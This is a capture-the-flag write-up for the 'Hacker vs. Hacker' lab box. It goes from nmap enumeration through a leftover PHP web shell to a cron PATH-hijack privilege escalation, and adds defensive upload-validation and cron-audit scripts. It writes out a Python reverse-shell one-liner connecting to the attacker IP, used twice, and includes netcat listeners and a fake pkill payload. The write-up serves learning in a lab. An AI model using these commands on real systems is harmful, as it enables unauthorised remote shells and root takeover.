CTF: Hacker vs. Hacker
Information
- IP: 10.10.253.199
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p22,80 -A 10.10.253.199
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-23 22:57 CEST
Nmap scan report for 10.10.253.199
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   36.57 ms 10.9.0.1
2   36.65 ms 10.10.253.199

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.63 seconds
```
Vulnerabilities search
First I visited the website and looked at the page source:
```html
<!-- im no security expert - thats what we have a stable of nerds for - but isn't /cvs on the public website a privacy risk? -->
```
Apparently, if you upload your CV, it can be found under /cvs.
So let's try to upload a PHP shell.
The file upload.php has already been hacked; the hacker seems to be fair and left us some comments:
```html
<!-- seriously, dumb stuff:

$target_dir = "cvs/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

if (!strpos($target_file, ".pdf")) {
  echo "Only PDF CVs are accepted.";
} else if (file_exists($target_file)) {
  echo "This CV has already been uploaded!";
} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
  echo "Success! We will get back to you.";
} else {
  echo "Something went wrong :|";
}
-->
```
So we can't upload files anymore, but the hacker surely used this exploit.
The original code only checked that ".pdf" appeared somewhere in the filename (strpos is a substring search, not an extension check), so a file named shell.pdf.php would have passed :)
```console
$ curl 10.10.253.199/cvs/shell.pdf.php
<pre></pre>
boom!
```
Here we go :)
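As an added example (not the site's code; the function names and the sample uploads are constructed for it), here is the original substring check modelled in Python next to a stricter validator, to show exactly why shell.pdf.php passed and what a fix has to check instead: the last extension, a single extension, the file's magic bytes, and a server-chosen storage name.

```python
"""Added example: a substring check is not an extension check.

Models the PHP logic from the hacker's comment (strpos on ".pdf") and puts
a stricter validator next to it. Not the site's code; names and sample
inputs are constructed for this example.
"""
import os
import re
import secrets
from typing import Optional

ALLOWED_EXTENSIONS = {".pdf"}
PDF_MAGIC = b"%PDF-"


def vulnerable_accepts(filename: str) -> bool:
    """Mirror of the original check: accept if ".pdf" occurs anywhere.

    PHP's `!strpos($target_file, ".pdf")` rejects only when ".pdf" is absent
    (or sits at offset 0, which cannot happen after the "cvs/" prefix), so
    any name that merely contains ".pdf" is accepted, shell.pdf.php included.
    """
    target_file = "cvs/" + os.path.basename(filename)
    return target_file.find(".pdf") > 0


def hardened_accepts(filename: str, content: bytes) -> Optional[str]:
    """Stricter validator: returns a safe storage name, or None to reject.

    - the *last* extension must be on the allow-list (shell.pdf.php fails)
    - the name may carry only one extension and simple characters
    - the bytes must start with the PDF magic, not just claim to be a PDF
    - the stored name is random, so nothing client-controlled reaches the path
    """
    base = os.path.basename(filename)
    root, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    if "." in root or not re.fullmatch(r"[A-Za-z0-9_-]+", root):
        return None
    if not content.startswith(PDF_MAGIC):
        return None
    return secrets.token_hex(16) + ext.lower()


if __name__ == "__main__":
    # Constructed sample uploads: a real-looking PDF and a double-extension name.
    samples = [
        ("cv.pdf", b"%PDF-1.4\n%constructed sample"),
        ("shell.pdf.php", b"<?php system($_GET['cmd']); ?>"),
        ("shell.php", b"<?php system($_GET['cmd']); ?>"),
    ]
    for name, data in samples:
        print(f"{name:15} original: {vulnerable_accepts(name)!s:5} "
              f"hardened: {hardened_accepts(name, data) is not None}")
```

The vulnerable model accepts both cv.pdf and shell.pdf.php; the hardened one accepts only the first, and only when the content actually starts with a PDF header.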
This script probably takes the command to execute as a parameter. Let's keep it simple and try cmd:
```console
$ curl "10.10.253.199/cvs/shell.pdf.php?cmd=ls"
<pre>index.html
shell.pdf.php
</pre>
boom!
```
Alright :)
Exploit
Let's send this as the cmd parameter:
```shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
- On the attacker box:
```shell
nc -nlvp 1234
```
And we get a shell:
```shell
cat /home/lachlan/user.txt
```
Privilege escalation
Enumeration for privesc
By reading /home/lachlan/.bash_history I found lachlan's password.
I could connect via ssh, but the hacker kept throwing me out via:
```console
$ cat /etc/cron.d/persistence
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
```
Two things are important here:
- The PATH environment variable: it begins with /home/lachlan/bin
- The pkill command, which is called without an absolute path
So if we create a fake pkill binary in /home/lachlan/bin, cron (running as root) will call that one instead and our tty won't be killed anymore :)
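Added example, not part of the box or of this writeup: a small audit script that parses a cron.d file and flags the two issues above, a PATH entry outside the root-owned system directories and commands run by bare name (which cron resolves through that PATH). It generalises the check to any cron.d file; the sample file embedded in it is constructed after the one above, the function names are mine, and the check is purely lexical (it does not stat the directories).

```python
"""Added example: audit a cron.d file for PATH hijack conditions.

Flags (1) PATH entries that are not standard system directories and
(2) commands invoked by bare name, which get resolved through that PATH.
Lexical only; the sample crontab below is constructed for this example.
"""
import re
from typing import List

TRUSTED_PATH_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin",
                     "/usr/local/bin", "/usr/local/sbin"}
SHELL_KEYWORDS = {"for", "do", "done", "if", "then", "else", "fi",
                  "while", "until", "in", "case", "esac"}
SEPARATORS = re.compile(r"&&|\|\||;|\|")

# Constructed sample, modelled on /etc/cron.d/persistence from the box.
SAMPLE_CRON_D = """\
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
0 3 * * * root /usr/bin/find /tmp -mtime +7 -delete
"""


def command_words(command: str) -> List[str]:
    """First word of every simple command, including those inside backticks."""
    segments = re.findall(r"`([^`]*)`", command)          # command substitutions
    segments.append(re.sub(r"`[^`]*`", " ", command))      # the rest, backticks blanked
    words = []
    for segment in segments:
        for piece in SEPARATORS.split(segment):
            tokens = piece.split()
            if tokens[:1] == ["for"]:                      # "for VAR in" is not a command
                tokens = tokens[3:]
            while tokens and tokens[0] in SHELL_KEYWORDS:   # do / done / then ...
                tokens.pop(0)
            while tokens and "=" in tokens[0] and not tokens[0].startswith("/"):
                tokens.pop(0)                              # leading VAR=value prefixes
            if tokens:
                words.append(tokens[0])
    return words


def audit_crontab(text: str) -> List[str]:
    """Return one finding per untrusted PATH entry and per bare-name command."""
    findings = []
    path_dirs: List[str] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = re.fullmatch(r'PATH\s*=\s*"?([^"]*)"?', line)
        if match:
            path_dirs = [d for d in match.group(1).split(":") if d]
            for d in path_dirs:
                if d not in TRUSTED_PATH_DIRS:
                    findings.append(f"line {lineno}: PATH contains untrusted directory {d}")
            continue
        if "=" in line.split()[0]:
            continue                                        # other VAR=value line
        if line.startswith("@"):                            # @reboot user command
            fields = line.split(None, 2)
            user, command = fields[1], fields[2]
        else:                                               # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        for word in command_words(command):
            if not word.startswith("/"):
                findings.append(f"line {lineno}: {user} job runs '{word}' by bare name "
                                f"(resolved via PATH {':'.join(path_dirs) or '<cron default>'})")
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRON_D):
        print(finding)
```

On the sample it reports the /home/lachlan/bin PATH entry and the bare `pkill`; the line using only absolute paths produces nothing. The fix on the defender's side is the mirror image of the findings: no user-writable directory in a root crontab's PATH, and absolute paths for every command it runs.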
Exploit
To do that I used this command:
```shell
ssh lachlan@10.10.253.199 -t "touch /home/lachlan/bin/pkill ; chmod +x /home/lachlan/bin/pkill"
```
After that, all we need is to connect using ssh and fill our new pkill script with something useful:
```console
$ vi /home/lachlan/bin/pkill
```
with this content:
```shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
- On the attacker box:
```shell
nc -nlvp 1234
```
And we are root :)
```console
# cat /root/root.txt
```
\o/